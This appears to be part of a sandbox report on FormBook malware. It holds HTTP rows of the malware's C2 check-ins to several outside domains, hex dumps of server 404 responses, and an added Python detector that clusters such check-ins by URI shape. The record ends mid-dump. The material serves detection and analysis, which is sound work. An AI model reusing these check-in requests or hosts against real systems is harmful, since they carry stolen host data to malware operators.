        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=BFqfPYQ6Rc2mbekoZnhhN28rIM4KcYUdKeGPb5qgdPRiCoEueOOZiURhvdwkEmvoJvWE5RZiBCNwm7zhRu2A+WCDMptVnP5c5Q==&6SE=F8zFuLn HTTP/1.1 | Host: www.brightfms.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=hOvML0SIJI9mj/fVfRhHepYZOU2m/dN5Na3UVct1YKAZzOLDbZKzqMpLuDmWZppR8Dfu1BJtX3CBTvv/fKLJ92Wtoj7W2JzMDw==&6SE=F8zFuLn HTTP/1.1 | Host: www.eta-trader.net | Connection: close | Data Raw: 00 00 00 00 00 00 00
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=JQY8+24Njt/kPRjDacJftkXMjEMtZDsomMU4C5dHhuIEkrjQwkIyHBDAmNyMXnYjy8/Wz0vFGvMg0maSaemc6vUg0VCqTOU0ug==&6SE=F8zFuLn HTTP/1.1 | Host: www.funvacayflorida.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&6SE=F8zFuLn HTTP/1.1 | Host: www.interactive-media.ru | Connection: close | Data Raw: 00 00 00 00 00 00 00
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&6SE=F8zFuLn HTTP/1.1 | Host: www.cardinialethanol.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
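Every request above has the same shape: a four-character first path segment (/d91r/), one long base64 parameter carrying the encrypted host data, one short trailing id (6SE=F8zFuLn), no User-Agent, Connection: close, and a different Host each time. That is the traffic the three ET Snort rules fire on, and it is also why the signature list flags "HTTP GET or POST without a user agent". The useful detection is not any single request but the cluster: one path and id cycling through fifteen unrelated domains, whose Host values are the IOC list. The following is an added example, not code from the Joe Sandbox report and not the logic of the cited ET rules; the URI-shape heuristic and the minimum blob length are assumptions of this example derived from the rows above, SAMPLE_REQUESTS holds three check-ins copied from this report plus two constructed benign requests, and the domains example.com and example.org in the benign rows are placeholders.

```python
"""Spotting FormBook-style check-ins in HTTP request logs.

Added example, not code from the Joe Sandbox report and not the ET rule logic.
The URI-shape heuristic is derived from the requests printed in this report and
is an assumption of this example; MIN_BLOB_BYTES is a tuning choice.
"""
import base64
import binascii
import re
from collections import defaultdict

SAMPLE_REQUESTS = [
    # three check-ins copied from the report's HTTP rows
    "GET /d91r/?z4=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&6SE=F8zFuLn HTTP/1.1\r\nHost: www.interactive-media.ru\r\nConnection: close\r\n\r\n",
    "GET /d91r/?z4=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&6SE=F8zFuLn HTTP/1.1\r\nHost: www.cardinialethanol.com\r\nConnection: close\r\n\r\n",
    "GET /d91r/?z4=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&6SE=F8zFuLn HTTP/1.1\r\nHost: www.dexmart.xyz\r\nConnection: close\r\n\r\n",
    # constructed benign traffic: an ordinary API call, and a near-miss whose blob is too short
    "GET /api/v1/items?page=2&sort=asc HTTP/1.1\r\nHost: example.com\r\nUser-Agent: curl/8.0\r\nConnection: close\r\n\r\n",
    "GET /abcd/?id=SGVsbG8=&t=abcdef HTTP/1.1\r\nHost: example.org\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
]

# /<short path>/?<k1>=<base64 blob>&<k2>=<short id>
CHECKIN_URI = re.compile(
    r"^/(?P<path>[A-Za-z0-9]{3,5})/\?"
    r"(?P<k1>[A-Za-z0-9]{1,4})=(?P<blob>[A-Za-z0-9+/]+={0,2})"
    r"&(?P<k2>[A-Za-z0-9]{1,4})=(?P<id>[A-Za-z0-9]{4,12})$")
MIN_BLOB_BYTES = 24   # assumption: a real check-in carries a few dozen bytes of encrypted host data


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, URI and lower-cased headers."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, uri, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return {"method": method, "uri": uri, "version": version, "headers": headers, "body": body}


def checkin_indicators(req):
    """Return the indicators that fired for one request ([] means no match)."""
    if req["method"] != "GET":
        return []
    m = CHECKIN_URI.match(req["uri"])
    if not m:
        return []
    try:
        blob = base64.b64decode(m["blob"], validate=True)
    except (binascii.Error, ValueError):
        return []
    if len(blob) < MIN_BLOB_BYTES:
        return []
    hits = ["uri_shape"]
    if "user-agent" not in req["headers"]:
        hits.append("no_user_agent")
    if req["headers"].get("connection", "").lower() == "close":
        hits.append("connection_close")
    return hits


def cluster_checkins(raw_requests, min_hosts=2):
    """Group matching requests by (path, id parameter). One campaign cycles the
    same path and id through many unrelated domains, so a cluster spanning
    several Host values is the strong signal and its hosts are the IOC list."""
    hosts = defaultdict(set)
    for raw in raw_requests:
        req = parse_request(raw)
        if not checkin_indicators(req):
            continue
        m = CHECKIN_URI.match(req["uri"])
        hosts[(m["path"], m["k2"], m["id"])].add(req["headers"].get("host", "?"))
    return {key: sorted(h) for key, h in hosts.items() if len(h) >= min_hosts}


if __name__ == "__main__":
    for key, domains in cluster_checkins(SAMPLE_REQUESTS).items():
        print(key, domains)
```

Feed it the request records from a proxy or Zeek http.log and the cluster key gives you a campaign handle that survives the domain rotation the sample shows; the base64 blob itself is encrypted and is only checked for shape here, not decoded.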
        Source: Joe Sandbox View | IP Address: 199.192.26.35
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49854
        Source: unknown | Network traffic detected: HTTP traffic on port 49854 -> 443
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 20 Mar 2023 14:00:57 GMTContent-Type: text/htmlContent-Length: 62299Connection: closeETag: "627b7393-f35b"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e d0 92 d0 b8 d1 82 d1 80 d0 b8 d0 bd d0 b0 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 b0 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 68 6f 70 77 69 6e 64 6f 77 2e 63 73 73 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 73 76 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 65 2e 77 65 62 6e 61 6d 65 73 2e 72 75 22 3e 0a 20 20 3c 6d 65 74 61 20 
70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 bf d1 80 d0 be d0 b4 d0 b0 d0 b5 d1 82 d1 81 d1 8f 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 65 2e 77 65 62 6e 61 6d 65 73 2e 72 75 2f 69 6d 67 2f 6f 67 5f 69 6d 61 67 65 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 2d 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 31 30 20 63 6f 6c 2d 6c 67 2d 70 75 73 68 2d 31 22 3e 0a 20 20
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 14:01:20 GMTcontent-type: text/htmlcontent-length: 175connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:01:26 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:01:29 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:01:32 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:01:35 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Length: 80Content-Type: text/html; Charset=gb2312Server: Microsoft-IIS/7.5Set-Cookie: ASPSESSIONIDSADQDCCQ=JLFAOJLDJFMOGDBJJHJKJGDI; path=/X-Powered-By: ASP.NETDate: Mon, 20 Mar 2023 14:01:53 GMTConnection: closeData Raw: 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 31 35 31 30 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e Data Ascii: <script language="javascript" type="text/javascript" src="/15109.js"></script>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Length: 80Content-Type: text/html; Charset=gb2312Server: Microsoft-IIS/7.5Set-Cookie: ASPSESSIONIDSADQDCCQ=KLFAOJLDIIBEJPOFLJFDPJIM; path=/X-Powered-By: ASP.NETDate: Mon, 20 Mar 2023 14:01:56 GMTConnection: closeData Raw: 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 31 35 31 30 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e Data Ascii: <script language="javascript" type="text/javascript" src="/15109.js"></script>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Length: 80Content-Type: text/html; Charset=gb2312Server: Microsoft-IIS/7.5Set-Cookie: ASPSESSIONIDSADQDCCQ=MLFAOJLDPKKCNCDLACPAAGOI; path=/X-Powered-By: ASP.NETDate: Mon, 20 Mar 2023 14:01:59 GMTConnection: closeData Raw: 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 31 35 31 30 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e Data Ascii: <script language="javascript" type="text/javascript" src="/15109.js"></script>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:02:08 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:02:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:02:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:02:16 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Mon, 20 Mar 2023 14:02:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 06 Feb 2023 15:44:30 GMTETag: W/"6f-5f409e82bbe87"Content-Encoding: gzipData Raw: 36 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 f1 08 f1 f5 b1 b3 f1 70 75 74 b1 b3 09 f1 0c f1 71 b5 33 31 30 d1 cd cb 2f 51 48 cb 2f cd 4b b1 d1 87 08 da e8 43 94 38 f9 bb 44 02 95 1b da b9 16 15 e5 17 29 e4 27 27 97 16 15 a5 a6 58 29 00 75 29 e8 2a 20 e9 03 aa b1 f1 08 b2 b3 d1 87 68 d1 07 5b 04 00 16 77 99 ec 6f 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 68putq310/QH/KC8D)''X)u)* h[wo0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Mon, 20 Mar 2023 14:02:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 06 Feb 2023 15:44:30 GMTETag: W/"6f-5f409e82bbe87"Content-Encoding: gzipData Raw: 36 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 f1 08 f1 f5 b1 b3 f1 70 75 74 b1 b3 09 f1 0c f1 71 b5 33 31 30 d1 cd cb 2f 51 48 cb 2f cd 4b b1 d1 87 08 da e8 43 94 38 f9 bb 44 02 95 1b da b9 16 15 e5 17 29 e4 27 27 97 16 15 a5 a6 58 29 00 75 29 e8 2a 20 e9 03 aa b1 f1 08 b2 b3 d1 87 68 d1 07 5b 04 00 16 77 99 ec 6f 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 68putq310/QH/KC8D)''X)u)* h[wo0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Mon, 20 Mar 2023 14:02:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 06 Feb 2023 15:44:30 GMTETag: W/"6f-5f409e82bbe87"Content-Encoding: gzipData Raw: 36 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 f1 08 f1 f5 b1 b3 f1 70 75 74 b1 b3 09 f1 0c f1 71 b5 33 31 30 d1 cd cb 2f 51 48 cb 2f cd 4b b1 d1 87 08 da e8 43 94 38 f9 bb 44 02 95 1b da b9 16 15 e5 17 29 e4 27 27 97 16 15 a5 a6 58 29 00 75 29 e8 2a 20 e9 03 aa b1 f1 08 b2 b3 d1 87 68 d1 07 5b 04 00 16 77 99 ec 6f 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 68putq310/QH/KC8D)''X)u)* h[wo0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Mon, 20 Mar 2023 14:02:29 GMTContent-Type: text/htmlContent-Length: 111Connection: closeVary: Accept-EncodingLast-Modified: Mon, 06 Feb 2023 15:44:30 GMTETag: "6f-5f409e82bbe87"Accept-Ranges: bytesData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 2d 6e 6f 74 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 48 31 3e 45 72 72 6f 72 20 6f 63 63 75 72 72 65 64 3a 20 34 30 34 20 2d 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 48 31 3e 3c 48 52 3e 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e Data Ascii: <HTML><HEAD><TITLE>404-not found</TITLE></HEAD><BODY><H1>Error occurred: 404 - not found</H1><HR></BODY></HTML>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:02:34 GMTServer: ApacheContent-Length: 690Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 